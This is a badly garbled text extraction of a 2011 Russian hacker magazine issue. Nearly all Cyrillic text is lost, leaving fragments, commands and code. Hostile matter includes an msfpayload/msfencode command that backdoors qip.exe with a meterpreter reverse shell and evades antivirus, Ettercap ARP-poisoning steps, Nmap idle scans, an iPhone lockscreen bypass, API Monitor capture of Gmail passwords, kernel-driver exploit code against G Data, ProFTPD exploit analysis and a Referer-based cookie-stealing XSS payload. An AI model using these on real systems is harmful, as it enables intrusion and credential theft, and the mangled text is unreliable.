7/22/2019 2011 01(144).pdf
1/148
:. 32
01 (144) 2011
,
2010
:210
.
ICQ
CSRSS VPN
AMAZON
, , ., Total FootballVogue :).
.
1.., 19. ,..27 28:. , .: 77, :)., , .
2.: habrahabr.ru/company/xakep/blog/.:., ..
.,.:+154 3.,,it-.
3.www.xakep.ru, , ,,,., , .
4. ,, :).:.
!nikitozz, [email protected]
vkontakte.ru/club10933209.
INTRO
MegaNews004
FERRUM016 -
PC_ZONE020 API Monitor API-
023
024 VPN Amazon VPN-
028 Internet Explorer 9: - Internet Explorer 9 Beta?
032 :
036 Easy-Hack
040
046
050 ! HTTP-
054 ICQ: , , ICQ
058
064
070 Top5 2010
074 X-Tools
MALWARE076 /Internet Security
078 JS- Python
082 TO-52010
089 LinuxBSD
094 OpenSource
100 ,,
104 CSRSS ,Windows 7
108 GUI Mac OS X
112
116 ,TLS
SYN/ACK120 PCI DSS
124
,?
128 Zimbra:
134
140 FAQ UNITED FAQ
143 8.5
144 WWW2 web-
CONTENT
/> nikitozz ([email protected])> gorl([email protected])> Forb
([email protected])PC_ZONEUNITS step([email protected]), MALWARESYN/ACKDr. Klouniz([email protected])UNIXOIDPSYCHO Andrushock ([email protected])
> DVD Step([email protected])Unix- Ant([email protected])Security- D1g1 ([email protected])
>xakep.ru ([email protected])
/ART>->
/PUBLISHING
> , 115280,, .,19,, 5,21.: +7 (495) 935-7034: +7 (495) 545-0906>>>. >>>>>>
/>GAMES & DIGITAL>
>>MAN TV>() ([email protected])>
>> ([email protected])>- ([email protected])
/> >
/:> ([email protected])>>>
>:-DVD-: [email protected].> : (495) 545-09-06: (495) 663-82-77: 8-800-200-3-999
> 101000, ,, / 652, , 77-11802 14.02.2002 Lietuvas Rivas,. 130 958 .
. . , , . . .:[email protected]
,, 2010
070Top5 2010
082 TO-52010
094
OpenSource
MEGANEWS X ([email protected])
MEGANEWS
9 Mozilla 6- Firefox. 86% Google.
Microsoft,
Project Natal,Kinect.
-
-
.
,,
., Kinect :
.
4201010.
Adafruit Industries
Kinect.XboxUSB-,,
.,RGB--,
$1000 (Kinect$150).,,
Microsoft, , :).,
11,GitHub .
OpenKinect (www.openkinect.org)
,.
.,MIT
Kinect iRobot Create,.
,KinetBot
3D.
(),
YouTube.
-
P2P-.Dead Drop
, USB-,
.-,
5.,
Dead Drop
,.,
,-
.
- :).-
deaddrops.com, .,
.,-
offline- :).
KINECT , KINECT
Facebook, -
,
.
Facebook -
.500
Facebook, .
? eBayFacebook Mail
$500-700 !?, ..,,,
.-
,
, SMS,
@facebook.
com.
,
.Office Web
Apps,Facebook mail
Microsoft Word, ExcelPowerPoint. ?
.,-
, more fun, -
.,,
500, Facebook
, -
,GMail GoogleHotMail
Microsoft. ,Facebook
fb.com,-
(American Farm Bureau) :).
Google Android 350
.
FACEBOOK-
-
. -
,
,
, ,
, .
,
-
,
-.-
, , .
-
(firmware) ,
IMEI-,
.
.
. IMEI,
(-
),
.:
IMEI -?
.:
-
, IMEI
. .
,
-
., ,
.:
, -, ?
.
, , ,
. ,
.
ANDROID-
,Android.-
Black Hat, Intel.
.-HTCAndroid .,
.
proof-of-conceptGoogle Market (Angry Birds)
:,-
.Alert Logic
(,-Webkit).
: www.exploit-db.
com/exploits/15423.,,, ,.
Android 2.2, 36%.,
,
Android OS.
,Google, ,.
Google Market, Android
2.2,, -
.
,:
,,!.,
,
,.
-
(RIAA)
.FacebookRIAA,
--
,
!
RIAA
The Pirate Bay, Torrentz, Demonoid
Rapidshare.,
--
.,
,
.
-
-. ,
,
, -
-. ,
,
, ,
, -
-.
.
... Google Maps.
,
-,
-
. -
(, -
) -, .
Google,,
. ,
: 2007
,
, - GPS
.:
-
, Google Maps
Wikipedia.
GOOGLE MAPS =
Skype , . 22
25 . 560 .
.
-,11
.,,
.
240,
.
-
:
~90,
. ,
-
:
,
.,
(:)
., (:
) ..-
:
.,
,
-
. 49.5%
294.000
Ru-Center.-
,
,
.,
-
.,,
,
-
.
-
:,
.-
Ru-Center,
,,-
,
,.
,
.19
14-
.
-
.(
).
.
,
ZeuS,,.
,,-,
.,
ZeuS,
.
,
.
.
,
,-
.
,
,,-,
(MDAC, Adobe Reader, Windows Help Center, Java),
ZeuS.
,,?
,-
.,
,
,,
ZeuS-.
:
ZEUS ,-
,
-
..,,.
,,
-
.
.
glassdoor.com.,
IT-,, - (Software Engineer).-,Facebook
$110 500,$11 900.Cisco$105 720
$8 529 Yahoo $101 638 $6 197.,,
Apple, MicrosoftGoogle.
$99 127,Google $98 814 (
: $21 364). Microsoft .-, .,
CEO Google,, (
20 000)10%,$1000.-
Facebook.
-
!, -
AVK.Dumx.A Trojan,
(
),
.
, -
,
, , .
, -
$300 000,
SMS .-
,
-
, -
. -
, -
SMS-
,
(,
)
.-
,
, -
.
.
SMS
-.
,-
IT-,
,
,
, -
.,
.
W3Techs , ,
, : PHP 74.9%, ASP.NET 23.8% Java 3.9%.
,Czernobyl,
,
.
Czernobyl,
AMD (Athlon
XP)-
x86.,
-
,www.woodmann.
com (,
).,
,
,
.,-
-
.
.AMD-, ,
,
,
.,
Czernobyl
,
.
-,
, .
AMD
-E-Ink
.-..E InkE Ink Triton,4096 16 .,-,,.Triton-:, ().?.20%Pearl, KindleKindle DX., Triton-.,,HanvonTechnology.80%.,9.68-- (800600)Wi-Fi3G, $440.E Ink
LG Display.
IPHONE $40 00017---
, iPhone 4.,
,.,,
Apple.?,
. iPhone
4,.
, -
,,Foxconn.,
$130 .
,Home,-
,.
$279.,$169.,
: www.whiteiphone4now.com.
Google Tier 1. 2010 5%
, 6.4%. Google 80%.
Windows 8 2012,
Microsoft.
Group-IB, 20%
. , $1 .
AOL
ICQ
Digital
Sky Technologies (DST),
Mail.ru Group, $187.5.
, ICQ
,
Mail.ru -
,
DST.
,,
ICQ-
. .
Nimbuzz., -
ICQ Nimbuzz :
icq-
, . Nimbuzz -
OSCAR (ICQ).,
QIP, R&Q, Miranda IM
., Mail.ru Group
ICQ Mail.Ru..,
. ICQ-
SMS
666 ICQ --,
, .:
, . ,,
. Jabber,
.
ICQ
,,
.
-
.,
,
., ,
,
.
,-
$28.
.
,
-
(
NFC Near Field Communication).
-
BlingTag,- (RFID). ,
,
-
,
PayPal
(,-
).SMS
.
,PayPal
,,
Bling Nation.
$100,
49.
.,
-
eBay
PayPal.
-
.
BlingTag20 000,
.,
,
Bling Nation,.
,
BlingTag
.
, , .
?, ,
,.
K750 Logitech-
.
!
, .-
, K750
(?),
,
.
8.
2.4 AES
128- (Logitech Unifying).
$80,
,
:).
Google , Chrome.
, : YouTube, Orkut, Blogger,
Google Docs Gmail. $500 $3133.7.
,
, Cyborg R.A.T.9Mad
Catz.
R.A.T.,,
.
:-
255600
25., 2.4
( 1).
1000, ,
, 6
/.
,
.:,
,,
,.
6 ., Cyborg R.A.T.9
,
., -
94
.
,Cyborg R.A.T.95-.
,,
. $150.
,
-
,
,
.,,,
.,,
,-
.,.
,,.
,
,.-
Samsung SCX-4600
,,
.
,
,
.,
-,
Samsung SCX-4600.,
,,,
-
:
,-
.
-.,
.
,
.,-
.
-
--
-
.,
AnyPrint,
,
-,
-
.,.
-
.
,,
AnyPrint.,
,
,,
,.
,:
,-
,
.
,,
, ,
.: 10,
(
, ,,) Samsung SCX-4600
38,9.
,-
.
Samsung SCX-4600-
, .,
, .z
SAMSUNGSCX-4600
,/:22
,:10
:1200X1200
,/:22
:1200X1200
,:250,:64
,:360
,:416X409X275.8
,:10.69
FERRUM
6500 P
,,
,-.
, ,-
.
,.
,, ,-?,., -
,,
-, ,
-.,
-
., , , ,
, .-
, (, )
.
, .-
, .
(),
!,
,
,
.
, , -
, ,
(
).-
.
,,
, .,
,
,
.,
.
,
:
,
., .-
, .
, /.,
,
, -, , -
.
CANYON CNR-WCAM820CREATIVE LIVE!CAM OPTIA AFGENIUS ISLIM 2020AFLOGITECH C600LOGITECH QUICKCAM SPHEREMICROSOFT LIFECAM VX-5500
-
-,-
.Canyon CNR-WCAM820
: () ,
, ,-
.,,
:,
,-
.,,
,
,.
,,.USB
,,
.
,,
.
.-
.,:-
.
,.,
(F/2,9),
.,
.
,,,
YouTube .
, -
.,
.
,
,,
, .
:,:2,0
(),:7,7
,/:30
:
:
CreativeLive!Cam Optia af
:,:2,0
(),:5,3
,/:30
:
:
CanyonCNR-WCAM820
2900 .1200 .
:,:2,0
(),:8,0
,/:30
:
:
LogitechC600
:,:2,0
(),:8,5
:1,3 9/, 2 6/
:
:
-, -,,-
, .
.,
,,-,
,.
, -.
,
, .,
: ,
..-
.
Genius iSlim2020AF
1700 . 3100 .
, ,
,
. (,)
., ,-
, :
.
,, -
.,, , -
:,
.
,-
.
.
:,: 2,0
(),: 8,0
,/: 30
:
:
:,: 0,3
(),: 1,3
,/: 30
:
:
Logitech QuickCamSphere
Microsoft LifeCamVX-5500
6000 . 2200 .
: ,-
.,
.
,,
.,
, ,
,
., -
, .,
, ,.
,
.,
.
.
-
, -
. ,
-.
,,
,.
,
,
.
.
-
.,
,
.
PC_ZONE
Windows
DLL, .. .
API-,
. ,
, ,
.. API-,
. (
)
.
, API-
. RegMon FileMon
. API-,
, -
. -
API-
API Monitor. ,
API-
COM-. , , .
API Monitor?: 1.5
2001 .
. !
.
,
.
.
Summary, ,
API: , DLL,
, API-
. ,
, .
10 000 API-
166 DLL', 700 600 COM-
( Shell, Browser, DirectShow, DirectSound, DirectX ..).
API
MSDN.
API Capture Filter API-,
. , API Monitor
GUID, IID REFIID, .
MSDN.
API Monitor -
, .
. CreateFileW
, , ,
, - . , , , . API-.
oxdef.info;
API-
API Monitor
dwShareMode. , ,
1, , ? (
Parameters Decode Parameters
Values), API Monitor
FILE_SHARE_READ | FILE_SHARE_WRITE".
API-
, .
, ,
,
API-.
, ReadFile
lpBuffer API
Monitor' lpNumberOfBytesRead
() .
, (-
Hex Buffer),
,
. , ,
,
.
Summary
, ,
API-.
, .
Call Stack,
.
API , -
, -.
GetLastError, CommDlgExtendedError, WSAGetLastError.
, NTSTATUS
HRESULT . , Notepad
CreateFile, API Monitor
, . , 5,
.
API Monitor
64-.
32- 64--
. , 32-
32--
.
32- 64-
Windows, 32- API
Monitor.
hook, API Monitor
. -
: /
, .
,
. ,
, API- CreateFileA, CreateFileW
NtCreateFile, .
API Capture Filter. -,
, -
, , , ,
.
(Ctrl-F Edit Find), -
API Monitor
Firefox
DVD-
dvd
DVD
CreateFile. API Monitor
. -
. ,
Running Processes,
API Monitor'.
. File Hook Process,
Windows notepad.exe (
). , ,
-.
.
. ,
, .
API Monitor. Summary
, Notepad'. CreateFileW
kernel32.dll, , , NtCreateFile.
:
.
. NtCreateFile STATUS_
OBJECT_NOT_FOUND, kernel32.dll Notepad
INVALID_HANDLE_VALUE 2 =
.
, -,
API Monitor. , NtCreateFile
STATUS_SUCCESS .
.
SSL- , API
Monitor, , -
API-.
, ,
SSL-, .
API Monitor , -
,
. , , , -
, -
. Internet Explorer:
1., -
SSL. Gmail.
2. Windows Internet. : API Monitor
.
3. Running Processes Internet Explorer
(Hook).
4. ,
.
Google SSL-. -
API-.
5. , API Monitor, API-
HttpSendRequestW. ,
: , , -, . lpOptional
(Post-Call Value). -
, Hex Buffer
, Internet Explorer .
, ASCII.
, -
.
Firefox, -
Windows Internet Netscape
Portable Runtime Mozilla SSL. , API Monitor
. , , -
PR_Write. Firefox',
. Summary PR_Write,
xul.dll. . -
POST-,
buf. , POST /
accounts/ServiceLoginAuth ( Hex Buffer). -
Pre-Call Value ,
. . , API Monitor
. ,
Tools Options Maximum size of
captured buffers. .
API-, , -
API-, (. ). ,
, API Monitor , .
DLL-, XML-,
.z
API-WinApiOverride API-, - API, -. , , .
kerberos WinAPI-. - API, , . *.rep .
APISpy32APISpy32 WinAPI. -, .
GMail
GMail
(.. cloud computing) ,
, ,
. , -
. Amazon S3 -
,
, . S3
Amazon
Web Services (AWS). , -
,
().
.
Amazon Web Services Amazon , -: Amazon
Elastic Compute Cloud ( EC2), Amazon Elastic Block
Store ( EBS), Amazon Simple Storage Service ( S3).
.
, cloud computing .
EC2
.
, .
Instance.
, , root-
SSH ( Linux) -
RDP ( Windows).
.
, .
:
.
, -
, . --
.
.
-
Amazon EBS. :
Amazon . , , ,
, , , VPN-.
Step twitter.com/stepah
VPN-
VPN Amazon
25 , .
, .
Volume
.
, ,
.
S3
, .
, , -
.
, :10 , 1 5000
, -
(5 ).
, AWS Free Usage
Tier -
.
, -
. -
. ,
750
EC2 (, ), 10 EBS
(, ,
, Ubuntu) 5 S3.
Amazon,
.
,
, , ,
.
.
VPN-,
!
Amazon'. -
AWS (aws.amazon.com)
Sign up Now.
I am a new user
Amazon.
,
. : -
,
. Amazon $1-2, -
.
Visa MasterCard:
, - Qiwi.
Amazon -
.
-
(EC2, EBS, S3
..).
. -
, 4-
PIN-,
. -
. EC2 S3
: Access Key ID Secret Access Key,
AWS
Ubuntu
:
AWS.
dvd
DVD
X.509 Certificate. ,
-, : Amazon
.
AWS (aws.amazon.com/
console). ,
, EC2.
c EC2,
(.. ) .
99.95%
.
Launch Instance ().
.
: Small Instance (Default) 1.7 GB of memory,
1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of
instance storage, 32-bit platform $0.10 Unix $0.125
. , $0.10 -
$0.17 . ,
. ,
Amazon Micro
Instance. .
. AMI
(Amazon Machine Image), , ,
(, Apache, MySQL,
Memcached ..), (, -
). .
AMI-
Amazon', . Community
AMIs 6000 Linux Windows.
Ubuntu.
AMI , 15 EBS, 10
. , Ubuntu 10.04 -
ami-c2a255ab, 10 . ID
Install. -
, . ,
, Micro Instance. -
Amazon
.
, .
Instances . -
, State Running ,
. -
. Public DNS
. : , IP-
. !
Elastic IPs
IP-.
: , . ,
IP-, .
SSH,
. :
. , -
Security Group. ,
.
EC2, -
Ubuntu.
SSH.
PuTTY. , Amazon pem,
PuTTY ppk. , PuTTYgen
: (Load private
key file), File.
SSH-
, :
Sessions IP- (Elastic IP)
Host Name;
Connection Data Auto-Login
ubuntu, -
;
Connection SSH Auth
private-;
Session
Save.
, ,
Open. .
PPTP, PuTTY
, Ubuntu.
EC2- AWS, , . Elasticfox Firefox.
AWS Access Key AWS Secret Access Key., Amazon (s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip ) EC2. Java Runtime Environment.
Instance: - Micro (t1.micro)
Amazon EC2
,
SSH-. .
, , SSH--
. :
, . , ,
VPN-. -
: OpenVPN, PPTP-.
. OpenVPN
. PPTP ,
, GRE-
. .
, Ubuntu, -
PPTP- . :
sudo aptitude install pptpd
.
IP-,
.
2 /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5
PPTP
192.168.242.1, 4 :
192.168.242.2 192.168.242.5.
DNS-. Amazon
(172.16.0.23), , , Google Public DNS.
/etc/ppp/pptpd-options:
ms-dns 8.8.8.8
PPTP-:
# USERNAME and PASSWORD are placeholders for the VPN login and its password;
# a plain "sudo echo ... >> file" fails because the redirect runs without root
echo "USERNAME pptpd PASSWORD *" | sudo tee -a /etc/ppp/chap-secrets
. -
. /etc/ppp/chap-
secrets ,
PPTP-:
sudo /etc/init.d/pptpd restart
, -
. ,
VPN-. ,
NAT. ,
/etc/sysctl.conf :
net.ipv4.ip_forward=1
:
sudo sysctl -p
NAT, :
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
. :)
/etc/rc.local,
exit 0 :
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
VPN . -
, - IP-
, . speedtest.net
. , , VPN
. Amazon 15
.
: 10 . :)
Amazon () -
. . EC2 -
, .
.
VPN-.
: ,
, -. ,
Amazon Instance GPU,
CUDA.
,
? z
SSH-
VPN- Windows
15 - InternetExplorer 9. , .
, . :)
-Internet Explorer 9?
INTERNETEXPLORER 9:
, IE ,
, . :
, -
. -,
, -. -
,
. -
, -. ,
Microsoft
Server is too busy :).
,
.
favicon, , -
, .
10 , -
, . -
NumRows HKEY_CURRENT_USER\
Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage.
, :
. ,
, ,
( 20-30 ), -
-
. ,
, .
. ,
, ,
: -
. ,
. Firefox'
.
-, - Snap, Windows.
.. ,
(),
.
. -
,
. Windows 7,
IE .
Internet Explorer ,
. , ,
,
(, GMail)
.
Technical Review, InternetExplorer .
. -,
, .
, -,
. ,
,
IE9 Beta. Direct2D -
GPU.
,
GPU (
). -
. -, ,
, JavaScript-, Chakra.
JavaScript. -
. ( IE8), IE9
JS
DOM, -
(.. marshaling). -
, .
, Internet
Explorer, JS- .
, JavaScript
, .
, .
,
, - Chakra,
JavaScript WebKit's SunSpider. 17
Internet Explorer 9, Platform
Preview 7, , -
.
Internet Explorer
-
,
? ,
, , , ?
: -
= -
- + -
, .
-
:
, .
100% . ?
, ,
: ,
,
. , , -
.
Debian
Linux , ,
. - HTTP- nginx,
reverse proxy. -
, PHP-, -
. PHP--
mod_php Apache
, FastCGI,
,
. -
PHP- (, Facebook
PHP C HipHop),
-
XCache.
:
, -
, C
, MySQL -
. -
. ,
,
().
memcached. : -
,
.
"" .
, ,
, , , . ,
node.
js (
JavaScript ][ 08/2010) -
XMPP aka Jabber ().
ffmpeg, - VLC.
-
-,
. ..
, .. -
.
. , -
, ,
,
. ,
, - 20%.
-
,
DNS ( 32 IP-),
,
. ,
()
,
memcached -
.
, ,
,
PHP-.
Facebook (
MySQL.
,
,
opensource . -
(),
-
.
, -
:
- 8- Intel ( ,
);
- 64 ;
- 8 ;
- RAID (
).
, ,
. -
4 -
,
, .
, Content Delivery
Network
.
, -
,
. ,
: ? !.
, ,
( xfs) -
, . ,
,
:).
C. , ,
,
, , , ,
. ,
, TopCoder,
:
-
-
-
-
-
-
MySQL ,
.
memcached. -
(
).
. -
GPL, -
.
99,5 . 40 (-). 11 .
200 . 160/. 10 , 32 nginx ( Apache ). 30-40 , 2 , 5 -, . 10 .
Agile (), : , , ,
. (), Debian. , . memcached, ... -; , . . , -. 1 :).
GreenDog [email protected]
:.,-
,
:).
, (
,,
),, -
,.,
-.,
.
,,
., ,-
.
.
, .
1)
2):
Emergency Call
3) 3 :
# # #
4) Call Power
! Lockscreen Bypassed!
,-, -
. (
),,.
!,
-, .
iOS 4.1,
.4.2
,
,...
.-
:).
: EXE-,
:,
IExpress,
exe', .,
.
Metasploit' (metasploit.com).
msfencode -
exe-(payload),
exe-.-
.
.qip.exe.
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 R | ./msfencode -t exe d ~ -x qip.
exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3
msfpayload -
(LHOST). (R).
msfencode.(-e x86/
shikata_ga_nai) (- 3).exe- (-t exe).,exe--
(-d ~ ), qip.exe (-x qip.exe).
-k ,-
exe-.
q_bd101.exe (-o q_bd101.exe).
Exe-,,,
,
MSF.
, .-
, :).
.-,
,.- (
) .
.
-k,.-,-
,.
-, (1542
virustotal.com),.
Windows! , CRC, .-
. ,
, .
! -
,
:)
: IPHONE
2
Easy Hack
1
: -
:
, ,.
-,: ,
:).-,,
,.,
, ,
. remote_browser Ettercap-NG (ettercap.
sourceforge.net).-,-!
.
, ettercap.conf:
1) :
nano /etc/etter.conf
2) ec_uid, ec_gid :
ec_uid = 0
ec_gid = 0
3) remote_browser :
remote_browser = "firefox http://%host%url"
,
,.
-Ettercap:
1) ettercap:
Ettercap G
2)Sniff Unified sniffing;3)Plugins Manage the plugins;
4) remote_browser;
5) :
Start Start sniffing--
.
,arp-poison.:
1) :
Hosts Scan for hosts
2) :
Hosts Host list IP_router Add to T1
3) ():
Hosts Host list IPs Add to T2
4) arp-poison:
Mitm Arp poisoning Sniff remote connection
pcap-, tcpreplay:
tcpreplay i eth0 blah_blah.pcap
.-,-
, ,
.-,,
..,,
.,,Win
Ettercap-NG.
: TCP/IP
:-,,,-
,.:
,.,,
TCP/IP,
().,,
,,
..,,
hping',-,.
,,Wireshark'a.
:)..
,,-
,.Colasoft
Packet Builder (colasoft.com/packet_builder).
.
,Windows.,-
.
,,
Ethernet, ARP, IP,
TCP, UDP.,,
:).
arp-poison GTK-Ettercap-NG
TCP/IP
3
4
. ,
, , ,
, , -
, .
, :).
,
,Wireshark., Colasoft
Packet Buildercap-.Wireshark
pcap-,cappcap,
.
,,
.-
TCP (-
),-
.
, Colasoft Packet Player.
., tcpreplay,
,.
,.
,.
: TCPDUMP'
:.
,-
,,,,
,-
..tcpdump
,
.
tcpdump,WireShark'
Capture Filter,.
.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp portrange 1-1024
-i eth0 ;
-w test.pcap ,;
host 192.168.0.101 , /
192.168.0.101;
and, or ; tcp portrange 1-1024 -
tcp.
tcpdump -w test.pcap -s 1550 net 192.168 and not arp
-s 1550 , (
tcpdump' 96);
net 192.168 , /
192.168;
not arp ARP-.
tcpdump -w test.pcap src 192.168.0.101 and \( tcp port 31337 or udp \( port 4523 or port 5543 \) \)
,192.168.0.101,
31337 TCP,4523, 5543UDP.
,.
,, IP-, MAC-..
OR, ANDNOT.,
||, &&, !.,-
.,
Don't Fragment IP-,
SYN-TCP.:).
5
: NMAP
:.,, :).
,-/,
,.-
.,
.
(),,IP--
, .
,,
idle-,Nmap(nmap.org).Antirez
1998,()
IDIP,..
, IPID.
.
-.--
,.. .
,IPID.-
IPID.
TCP SYN--
IP.,SYN-ACK.SYN-ACK
TCP-,RST-
, IPID.
,RST-,-.RST-,
IPID.
,SYN-,IPID,
,.
IPID.
(),,
.nmap.
org/book/idlescan.html.
,.
,,,
.
,
.-
IPID,.
,
Nmap -
(-v).,IP ID Sequence Generation:
Incremental, ..-
,,
.
NSE, (nmap.org/nsedoc/
scripts/ipidseq.html).
.
:
nmap -v 192.168.0.105
192.168.0.105 IP.
idle-c:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1
-sI 192.168.0.105 IP-;
-PN,,-
;
-v;
192.168.0.1.
6
IP-,
.-,-,...
-,IDS/,-
.-,.
Idle- Nmap Wireshark
:
:,
.
. l517 (
:). code.google.com/p/l517 .
.
:
1) , -
.
2) , -.
3) .
4) -, -
.
5) (
).
6) , .
Win,,-.,
.,
.,,
;).
.z
7
- Windows
(CISS Research Team, http://twitter.com/NTarakanov)
PROFTPD
FTP Proftpd. ,
ZDI(Zero Day Initiative), 40.,
, ,
2 !
67-
e-zine'a phrack.
-
.
TARGETS
Proftpd version < 1.3.3c released.:
bugs.proftpd.org/show_bug.cgi?id=3521;
bugs.proftpd.org/show_bug.cgi?id=3519;
xorl.wordpress.com/2010/11/15/cve-2010-4221-proftpd-telnet_iac-
remote-stack-overflow/.
BRIEF
-
pr_netio_telnet_gets() src/netio.c
, Telnet IAC (Interpret As
Command) escape-. ,
, -
FTP FTPS ,
.
-
mod_site_misc.-
,
.
mod_site_misc
.
EXPLOIT
.
pr_netio_telnet_gets(),src/netio.c:
char *pr_netio_telnet_gets(char *buf, size_t buflen,
pr_netio_stream_t *in_nstrm,
pr_netio_stream_t *out_nstrm)
{
char *bp = buf;
unsigned char cp;
int toread, handle_iac = TRUE, saw_newline = FALSE;
pr_buffer_t *pbuf = NULL;
if (buflen == 0) {
errno = EINVAL;
return NULL;
}
...
buflen--;
if (in_nstrm->strm_buf)
pbuf = in_nstrm->strm_buf;
else
pbuf = netio_buffer_alloc(in_nstrm);
while (buflen) {
...
while (buflen && toread > 0 &&
*pbuf->current != '\n' && toread--) {
cp = *pbuf->current++;
pbuf->remaining++;
...
default:
*bp++ = TELNET_IAC;
buflen--;
,
. integer overflow,
buffer overflow.
Kingcope: exploit-
db.com/exploits/15449.:
FreeBSD, Linux: Debian, SUSE, CentOS. Debian Squeeze
ROP pool
buffer (cmd_rec res pr_cmd_read), UbuntuROP
: RWX , -
stub.
,Linux
(stack smashing protection) .-
, cookie
Ubuntu 24-,
100% .
SOLUTION
proftpd-1.3.3c, -
,buflen, :).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
we wrote IAC into the output buffer, and decremented
buflen (size of the output buffer remaining). Thus we
+ need to check here if buflen is zero, before trying to
decrement buflen again (and possibly underflowing the
buflen size_t data type).
+ */
+ if (buflen == 0) {
+ break;
+ }
*bp++ = cp;
buflen--;
.........
INTERNET EXPLORER (CVE-2010-3962)
TARGETS:Internet Explorer 6/7/8
BRIEF
Websense Security Labs., IE-
FltReleaseContext
02
.text:0001DBA0 cmp [ebp+DeviceObject], 8 ;
.text:0001DBA4 jb loc_1DD19
.text:0001DBAA mov eax, [edi] ; eax
4
.text:0001DBAC mov dword_228B4, eax ; -
x-refs() dword_228B4 ,
winsock bind,
, jmp
ecx, , , !
.text:00010CD4 sub_10CD4 proc near
.text:00010CD4 mov edi, edi
.text:00010CD6 push ebp
.text:00010CD7 mov ebp, esp
.text:00010CD9 mov ecx, dword_228B4 ; ecx
.text:00010CDF xor eax, eax
.text:00010CE1 test ecx, ecx
.text:00010CE3 jz short loc_10CE8 ;
NULL
.text:00010CE5 pop ebp
.text:00010CE6 jmp ecx ; !!!
.text:00010CE8 ; ------------------------------------
.text:00010CE8
.text:00010CE8 loc_10CE8:
.text:00010CE8 pop ebp
.text:00010CE9 retn 4
.text:00010CE9 sub_10CD4 endp
EXPLOIT
DeviceIoControl,bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
bind( ListenSocket, (SOCKADDR*) &service,
sizeof(service)); // !
,,dword_228B4
,
sub_10CD4,, -
(, ,)
PageFault.
,dword_228B4NULL,
jmp ecx ().
DWORD WINAPI ResetPointer( LPVOID lpParam ) {
HANDLE hDevice;
DWORD *inbuff;
DWORD ioctl = 0x220404, in = 0x10, out = 0x0C, len;
DWORD interval = 500; // , !
Sleep(interval);
inbuff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
*inbuff = 0;
hDevice = (HANDLE)lpParam;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
free(inbuff);
return 0;
}
SOLUTION
Trend Micro :).
G DATA
TARGETS:
G Data TotalCare 2011
BRIEF
:
1.Race ConditionNative API
2. Ioctl
Ioctl
MiniIcptControlDevice0.
, ,
.
Ioctl 0x83170180:
.text:00010DBC cmp edx, 83170180h ;
.text:00010EC1 call FltReleaseContext ;
WDK,
.
,
,
.
FLT_CONTEXT.
, .,
.
, :
Step'Windbg,
-
DoFreeContext:FltReleaseContext
DoReleaseContextDoFreeContext.
.text:00011F04; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
.text:00011F04 mov edi, edi
.text:00011F06 push ebp
.text:00011F07 mov ebp, esp
.text:00011F09 push esi
.text:00011F0A push edi
.text:00011F0B mov edi, [ebp+Entry]
.text:00011F0E mov esi, [edi]
;
DX http://kaimi.ru
,
,
,
. IT-, http://kaimi.
ru/quest. -:
SQL
HTML-. .
600, 21.
,
. ,
.
, -
. ,
.
, , , .
help
. , !
0:dx
: , . -
.
ans -, , ,
.
.
1:Kaimi: , -
, .
,
Google. ,
. ,
, .
-,
. 2.
2: Kaimi
:
. , 16 -
. , . ,
, , ,
. ,
, .
ans,
-
, , , SQL- XSS. , , 272 273 . , : .
Tineye.com! , ,
Babylon.
3: Kaimi
: ,
, . -
PHP-, , -
, ,
. -
dx :). !
. -,
, base64,
, eval
, .
, ...
,
. , -
, ,
. ,
, .
, if. , -, .
true, php-,
,
,
!
4: Kaimi
: PHP, 4.
ROM Dendy, - Kaimi.
, , ,
.
, ,
-
. ... Kaimi - ROM
, , , !
: Hex-, -
( "" "").
Hexposure.
ROM Nesticle, ,
- (, ).
,
.
-
.
, :
80=0
81=1
8A=A
...
tbl. ROM,
Hexposure,
.
- ROM, ,
.
,
, .
, - :).
PHP
ROM- Hexposure
base64
11: dx
: -
. ,
, ,
. -,
(, SoundForge), .
12: Kaimi
: . , ,
. , , QR-,
, Tineye
Google,
, , , qc,
. --
QR- (, zxing.org/w/decode.jspx), -
RAR!.
rar, WinRAR, ,
, , !
RAR-,
, ? ,
PNG-,
, , -
. WinRAR
, ,
.
13: dx
: .
, -
. , , exe-
(, , ..). -
. -
, , Resource Hacker, , .
14: dx
: , ,
.
: ,
, ASCII-
, ,
,
.
, -
. ,
. ,
4. -
, .
15: Kaimi
: , , ,
, .
exe-, --
. ,
. ,
: NES US 89. , ,
NES 1989 .
, , ,
.
NES (ru.wikipedia.org/wiki/___NES/).
1989 , ,
, Ninja Gaiden. exe
, , ,
.
.
! ,
, , -
. , , ;
Kaimi ,
: kaimi.ru/quest_x2/.
, !, , -
,
, , ,
:).
! z
!
Wergon
,
. HTTP (HyperText Transfer Protocol -
) -,
-. -
WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) -
.
.
: ,
. ,
/. -
IP (). ,
, .
, ,
. - Proxomitron.
, -
. HTTP-.
Proxomitron,
.
.
Headers :
, ,
New. , out.
.
Mozilla Firefox -
. Tamper Data
-
. :
, .
-
.
Modify Headers.
Always on, -
.
. (Add -
, Modify , Filter ),
, ;
. , .
, /-
. -
web-. ,
.
, HTTP- , , , - . ? ?
HTTP-
HP-include, -
. -
, ,
. , .
XSS,
.
,
. -
-
XSS
Referer (), ,
( %xx).
-
, Referer.
,
.
XSS. , -
, -
, , .SQL- . , -
, , .
PHP- ,
. .
, GET POST -
.
, , -
.
.
:
">. , -
. '">alert(document.
cookie).
; , , ,
DLE (DataLife
Engine), DLE Referer Module (
) . -
ICQ UIN-
MySQL-,
,
, -
.
php.ru
